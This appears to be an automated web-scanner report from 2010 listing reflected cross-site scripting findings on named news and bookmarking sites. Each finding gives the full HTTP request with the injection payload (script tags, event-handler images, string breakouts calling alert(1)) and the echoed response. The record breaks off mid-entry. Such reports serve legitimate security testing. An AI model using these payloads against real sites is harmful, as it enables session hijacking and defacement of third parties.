HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:17:59 GMT Server: Apache Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=4s7qqbdoi397sql4m22811sd85; expires=Wed, 05-Jan-2011 06:51:19 GMT; path=/; domain=.eleconomista.com.mx Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:18:00 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 13 Dec 2010 03:17:59 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Language: es Content-Length: 31969
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr"> <head profil ...[SNIP]... <!-- tagCertifica(106727,"/eleconomista/industrias/2010/06/21/sector-telecom-ganara-mayor-competencia-analistasfd318"-alert(1)-"d3ee9d4d75d"); //--> ...[SNIP]...
1.17. http://eleconomista.com.mx/industrias/2010/06/21/sector-telecom-ganara-mayor-competencia-analistas [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cab89"-alert(1)-"2b4f4ab8270 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /industrias/2010/06/21/sector-telecom-ganara-mayor-competencia-analistas?cab89"-alert(1)-"2b4f4ab8270=1 HTTP/1.1 Host: eleconomista.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:16:01 GMT Server: Apache Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=au5v4el48rufnabs5dpbv63s30; expires=Wed, 05-Jan-2011 06:49:21 GMT; path=/; domain=.eleconomista.com.mx Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:16:02 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 13 Dec 2010 03:16:01 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Language: es Content-Length: 43731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr"> <head profil ...[SNIP]... <!-- tagCertifica(106727,"/eleconomista/industrias/2010/06/21/sector-telecom-ganara-mayor-competencia-analistas?cab89"-alert(1)-"2b4f4ab8270=1"); //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b5533'><script>alert(1)</script>1f5138548c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /enb5533'><script>alert(1)</script>1f5138548c5/article/business_commerce/Nicaragua_Mobile_Penetration_to_Top_80_in_2015 HTTP/1.1 Host: en.centralamericadata.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 13 Dec 2010 03:17:43 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: CENTRALAMERICADATA=19b4nkobnbggr7csmuqs3e9v00; expires=Mon, 20-Dec-2010 03:17:43 GMT; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> 404 Not Foun ...[SNIP]... <a href='http://en.centralamericadata.com/enb5533'><script>alert(1)</script>1f5138548c5/article/business_commerce/Nicaragua_Mobile_Penetration_to_Top_80_in_2015'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf5ec'><script>alert(1)</script>b1e5f6c668d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/articlebf5ec'><script>alert(1)</script>b1e5f6c668d/business_commerce/Nicaragua_Mobile_Penetration_to_Top_80_in_2015 HTTP/1.1 Host: en.centralamericadata.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 13 Dec 2010 03:17:43 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: CENTRALAMERICADATA=gio37ug9cicmsrkpv83fti5mi6; expires=Mon, 20-Dec-2010 03:17:43 GMT; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> 404 Not Foun ...[SNIP]... <a href='http://en.centralamericadata.com/en/articlebf5ec'><script>alert(1)</script>b1e5f6c668d/business_commerce/Nicaragua_Mobile_Penetration_to_Top_80_in_2015'> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c21f0'><script>alert(1)</script>31c9b904f17 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/article/business_commercec21f0'><script>alert(1)</script>31c9b904f17/Nicaragua_Mobile_Penetration_to_Top_80_in_2015 HTTP/1.1 Host: en.centralamericadata.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 13 Dec 2010 03:17:44 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: CENTRALAMERICADATA=elqbnn32pulq40dves2uamaqq0; expires=Mon, 20-Dec-2010 03:17:44 GMT; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CakeCookie[]=Q2FrZQ%3D%3D.dME%3D; expires=Mon, 28-Nov-2011 03:17:44 GMT; path=/ Set-Cookie: CENTRALAMERICADATA=elqbnn32pulq40dves2uamaqq0; expires=Mon, 20-Dec-2010 03:17:44 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> 404 Not Foun ...[SNIP]... <a href='http://www.centralamericadata.com/es/article/business_commercec21f0'><script>alert(1)</script>31c9b904f17/Nicaragua_Mobile_Penetration_to_Top_80_in_2015'> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25857'><script>alert(1)</script>d8f7b2f1bde was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/article/business_commerce/Nicaragua_Mobile_Penetration_to_Top_80_in_201525857'><script>alert(1)</script>d8f7b2f1bde HTTP/1.1 Host: en.centralamericadata.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 13 Dec 2010 03:17:46 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: CENTRALAMERICADATA=2mn3ckubf50mda8otjfiu9mfs1; expires=Mon, 20-Dec-2010 03:17:46 GMT; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CakeCookie[]=Q2FrZQ%3D%3D.dME%3D; expires=Mon, 28-Nov-2011 03:17:46 GMT; path=/ Set-Cookie: CENTRALAMERICADATA=2mn3ckubf50mda8otjfiu9mfs1; expires=Mon, 20-Dec-2010 03:17:46 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> 404 Not Foun ...[SNIP]... <a href='http://www.centralamericadata.com/es/article/business_commerce/Nicaragua_Mobile_Penetration_to_Top_80_in_201525857'><script>alert(1)</script>d8f7b2f1bde'> ...[SNIP]...
1.22. http://en.centralamericadata.com/en/article/business_commerce/Nicaragua_Mobile_Penetration_to_Top_80_in_2015 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a353'><script>alert(1)</script>15be3e6330 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/article/business_commerce/Nicaragua_Mobile_Penetration_to_Top_80_in_2015?7a353'><script>alert(1)</script>15be3e6330=1 HTTP/1.1 Host: en.centralamericadata.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:17:36 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: CENTRALAMERICADATA=aori2v2k5rc93hepje0ab86qc3; expires=Mon, 20-Dec-2010 03:17:37 GMT; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CakeCookie[]=Q2FrZQ%3D%3D.dME%3D; expires=Mon, 28-Nov-2011 03:17:37 GMT; path=/ Set-Cookie: OAGEO=US%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C Set-Cookie: OAID=391b8b8024046aacde47f165c7e83cf0; expires=Tue, 13-Dec-2011 03:17:37 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 77078
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Nicaragua: M ...[SNIP]... <a href='http://www.centralamericadata.com/es/article/business_commerce/Nicaragua_Mobile_Penetration_to_Top_80_in_2015?7a353'><script>alert(1)</script>15be3e6330=1'> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10901'%3bb74e7291332 was submitted in the REST URL parameter 3. This input was echoed as 10901';b74e7291332 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/2010061707210200001.pnw/topstory.html10901'%3bb74e7291332 HTTP/1.1 Host: newsblaze.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:19:50 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9 Cache-Control: max-age=300 Expires: Mon, 13 Dec 2010 03:24:50 GMT Connection: close Content-Type: text/html Content-Length: 35817
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <link rel="stylesheet" href="http://NewsBlaze.com/newspaperinfo/includes/style/styl ...[SNIP]... <a href="mailto:comment@newsblaze.com?Subject=Comment:2010061707210200001.pnw&body=Comment%20on%20story%20http://newsblaze.com/story/2010061707210200001.pnw/topstory.html10901';b74e7291332"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a9dc7(a)fc6897a9e9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/2010061707210200001.pnw/topstory.htmla9dc7(a)fc6897a9e9d HTTP/1.1 Host: newsblaze.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:19:50 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9 Cache-Control: max-age=300 Expires: Mon, 13 Dec 2010 03:24:50 GMT Connection: close Content-Type: text/html Content-Length: 35829
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <link rel="stylesheet" href="http://NewsBlaze.com/newspaperinfo/includes/style/styl ...[SNIP]... Headline=AME%20Operators%20Experiment%20With%20Mobile%20Broadband%20Pricing%20Strategies,%20Pyramid%20Finds;yahooBuzzArticleId=http:%2F%2Fnewsblaze.com%2Fstory%2F2010061707210200001.pnw%2Ftopstory.htmla9dc7(a)fc6897a9e9d;</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 660ee"><img%20src%3da%20onerror%3dalert(1)>785d291e673 was submitted in the REST URL parameter 3. This input was echoed as 660ee"><img src=a onerror=alert(1)>785d291e673 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /story/2010061707210200001.pnw/topstory.html660ee"><img%20src%3da%20onerror%3dalert(1)>785d291e673 HTTP/1.1 Host: newsblaze.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:19:48 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9 Cache-Control: max-age=300 Expires: Mon, 13 Dec 2010 03:24:48 GMT Connection: close Content-Type: text/html Content-Length: 36018
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <link rel="stylesheet" href="http://NewsBlaze.com/newspaperinfo/includes/style/styl ...[SNIP]... <a href="http://newsblaze.com/sendtoafriend/2010061707210200001.pnw/topstory.html660ee"><img src=a onerror=alert(1)>785d291e673" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d8f47(a)375001c605a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/2010072006011400006.pnw/topstory.htmld8f47(a)375001c605a HTTP/1.1 Host: newsblaze.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:19:54 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9 Cache-Control: max-age=300 Expires: Mon, 13 Dec 2010 03:24:54 GMT Connection: close Content-Type: text/html Content-Length: 36064
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <link rel="stylesheet" href="http://NewsBlaze.com/newspaperinfo/includes/style/styl ...[SNIP]... cleHeadline=Undersea%20Cables%20and%20WiMax%20to%20Propel%20Africas%20Broadband%20Growth,%20Pyramid%20Finds;yahooBuzzArticleId=http:%2F%2Fnewsblaze.com%2Fstory%2F2010072006011400006.pnw%2Ftopstory.htmld8f47(a)375001c605a;</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6749"><img%20src%3da%20onerror%3dalert(1)>5aa62903c93 was submitted in the REST URL parameter 3. This input was echoed as c6749"><img src=a onerror=alert(1)>5aa62903c93 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /story/2010072006011400006.pnw/topstory.htmlc6749"><img%20src%3da%20onerror%3dalert(1)>5aa62903c93 HTTP/1.1 Host: newsblaze.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:19:52 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9 Cache-Control: max-age=300 Expires: Mon, 13 Dec 2010 03:24:52 GMT Connection: close Content-Type: text/html Content-Length: 36253
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <link rel="stylesheet" href="http://NewsBlaze.com/newspaperinfo/includes/style/styl ...[SNIP]... <a href="http://newsblaze.com/sendtoafriend/2010072006011400006.pnw/topstory.htmlc6749"><img src=a onerror=alert(1)>5aa62903c93" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7387c'%3bc578768a703 was submitted in the REST URL parameter 3. This input was echoed as 7387c';c578768a703 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/2010072006011400006.pnw/topstory.html7387c'%3bc578768a703 HTTP/1.1 Host: newsblaze.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:19:53 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9 Cache-Control: max-age=300 Expires: Mon, 13 Dec 2010 03:24:53 GMT Connection: close Content-Type: text/html Content-Length: 36052
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <link rel="stylesheet" href="http://NewsBlaze.com/newspaperinfo/includes/style/styl ...[SNIP]... <a href="mailto:comment@newsblaze.com?Subject=Comment:2010072006011400006.pnw&body=Comment%20on%20story%20http://newsblaze.com/story/2010072006011400006.pnw/topstory.html7387c';c578768a703"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9d8bf(a)d620161ff15 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/2010120306010700010.pnw/topstory.html9d8bf(a)d620161ff15 HTTP/1.1 Host: newsblaze.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:19:57 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9 Cache-Control: max-age=300 Expires: Mon, 13 Dec 2010 03:24:57 GMT Connection: close Content-Type: text/html Content-Length: 35098
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <link rel="stylesheet" href="http://NewsBlaze.com/newspaperinfo/includes/style/styl ...[SNIP]... eadline=Latin%20American%20Operators%20Look%20to%20Cash%20in%20on%20Mobile%20Remittances,%20Pyramid%20Finds;yahooBuzzArticleId=http:%2F%2Fnewsblaze.com%2Fstory%2F2010120306010700010.pnw%2Ftopstory.html9d8bf(a)d620161ff15;</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 906e2"><img%20src%3da%20onerror%3dalert(1)>72c6bfe3057 was submitted in the REST URL parameter 3. This input was echoed as 906e2"><img src=a onerror=alert(1)>72c6bfe3057 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /story/2010120306010700010.pnw/topstory.html906e2"><img%20src%3da%20onerror%3dalert(1)>72c6bfe3057 HTTP/1.1 Host: newsblaze.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:19:55 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9 Cache-Control: max-age=300 Expires: Mon, 13 Dec 2010 03:24:55 GMT Connection: close Content-Type: text/html Content-Length: 35287
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <link rel="stylesheet" href="http://NewsBlaze.com/newspaperinfo/includes/style/styl ...[SNIP]... <a href="http://newsblaze.com/sendtoafriend/2010120306010700010.pnw/topstory.html906e2"><img src=a onerror=alert(1)>72c6bfe3057" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bec49'%3bd3e9c559b95 was submitted in the REST URL parameter 3. This input was echoed as bec49';d3e9c559b95 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/2010120306010700010.pnw/topstory.htmlbec49'%3bd3e9c559b95 HTTP/1.1 Host: newsblaze.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:19:57 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9 Cache-Control: max-age=300 Expires: Mon, 13 Dec 2010 03:24:57 GMT Connection: close Content-Type: text/html Content-Length: 35086
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <link rel="stylesheet" href="http://NewsBlaze.com/newspaperinfo/includes/style/styl ...[SNIP]... <a href="mailto:comment@newsblaze.com?Subject=Comment:2010120306010700010.pnw&body=Comment%20on%20story%20http://newsblaze.com/story/2010120306010700010.pnw/topstory.htmlbec49';d3e9c559b95"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dc01"-alert(1)-"1fe8f119d84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php5dc01"-alert(1)-"1fe8f119d84 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 13 Dec 2010 03:17:44 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=ajgaecl874cfqae1c61bj67m32; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1447 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php5dc01"-alert(1)-"1fe8f119d84"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5db78<script>alert(1)</script>b688aeeda56 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.php5db78<script>alert(1)</script>b688aeeda56 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 13 Dec 2010 03:17:44 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=k86onhatlijlg7v472pnupbck2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1473 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php5db78<script>alert(1)</script>b688aeeda56</strong> ...[SNIP]...
1.34. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
